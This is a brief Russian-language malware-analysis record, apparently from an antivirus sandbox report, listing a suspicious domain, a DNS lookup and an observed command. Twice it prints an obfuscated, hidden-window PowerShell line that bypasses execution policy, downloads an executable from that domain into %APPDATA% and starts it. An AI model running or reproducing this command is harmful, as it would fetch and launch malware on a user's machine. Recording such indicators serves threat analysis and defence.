Техническая информация
- http://unityrulesyur.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWErsheLl.EXe -exeCuTIONPOliCy bypass -NOPrOfiLe -winDoWStYLe hIDDeN (nEW-OBJECT sySTem.neT.WEBcLieNt).DOwNlOaDfiLe('http://unityrulesyur.top/search.php','%aPPdaTa%.EXE');sTaRt-...
- DNS ASK un####ulesyur.top
- '<SYSTEM32>\cmd.exe' /c "poWErsheLl.EXe -exeCuTIONPOliCy bypass -NOPrOfiLe -winDoWStYLe hIDDeN (nEW-OBJECT sySTem.neT.WEBcLieNt).DOwNlOaDfiLe('http://unityrulesyur.top/search.php','%aPPdaTa%.EXE');sTaRt-...' (со скрытым окном)